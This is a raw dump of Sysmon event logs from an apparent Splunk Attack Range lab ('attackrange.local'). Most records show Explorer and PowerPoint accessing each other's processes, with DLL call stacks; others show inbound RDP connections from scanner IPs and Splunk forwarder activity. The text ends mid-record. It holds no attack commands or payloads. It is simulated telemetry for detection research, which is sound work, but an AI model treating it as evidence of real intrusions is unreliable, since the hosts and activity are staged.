Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.497{A7A01FEF-C0A6-607E-8105-00000000BB01}8366912C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\windows.storage.dll+3c6d1e|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.497{A7A01FEF-C0A6-607E-8105-00000000BB01}8366912C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3c9e7e|C:\Windows\System32\windows.storage.dll+3c5b4f|C:\Windows\System32\windows.storage.dll+3c6c90|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.497{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c73e8|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\comdlg32.dll+d92b|C:\Windows\System32\comdlg32.dll+d6ae|C:\Windows\System32\comdlg32.dll+12618|C:\Windows\System32\comdlg32.dll+6804b|C:\Windows\System32\comdlg32.dll+8e70|C:\Windows\System32\USER32.dll+156c2|C:\Windows\System32\USER32.dll+14d26|C:\Windows\System32\USER32.dll+14c46|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11815|C:\Windows\System32\USER32.dll+115a5|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+4a57e|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+5fa88|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\comdlg32.dll+22bad|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000081685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.497{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\comdlg32.dll+d92b|C:\Windows\System32\comdlg32.dll+d6ae|C:\Windows\System32\comdlg32.dll+12618|C:\Windows\System32\comdlg32.dll+6804b|C:\Windows\System32\comdlg32.dll+8e70|C:\Windows\System32\USER32.dll+156c2|C:\Windows\System32\USER32.dll+14d26|C:\Windows\System32\USER32.dll+14c46|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11815|C:\Windows\System32\USER32.dll+115a5|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+4a57e|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+5fa88|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.497{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\comdlg32.dll+d92b|C:\Windows\System32\comdlg32.dll+d6ae|C:\Windows\System32\comdlg32.dll+12618|C:\Windows\System32\comdlg32.dll+6804b|C:\Windows\System32\comdlg32.dll+8e70|C:\Windows\System32\USER32.dll+156c2|C:\Windows\System32\USER32.dll+14d26|C:\Windows\System32\USER32.dll+14c46|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11815|C:\Windows\System32\USER32.dll+115a5|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+4a57e|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+5fa88|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 354300x800000000000000081683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.987{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-8622-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.881{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-5901-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.234{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57640-false10.0.1.12-8000- 354300x800000000000000050758Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:13.738{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50783-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050757Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:15.272{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A98F3AE08CAB5146C81205F4CAD89563,SHA256=38BD1075CF1E5DFC5F874D91D7F308735815459E9CF1D2BBD44C7E21C6147EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050756Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:15.069{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62FDD13BDC6AA014BCBEEF6F7D5DB2BF,SHA256=2BCD99E7316D821E4A2FC30748D480859C78952655B8D0159EE86895E176A217,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:14.287{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52928-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.996{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 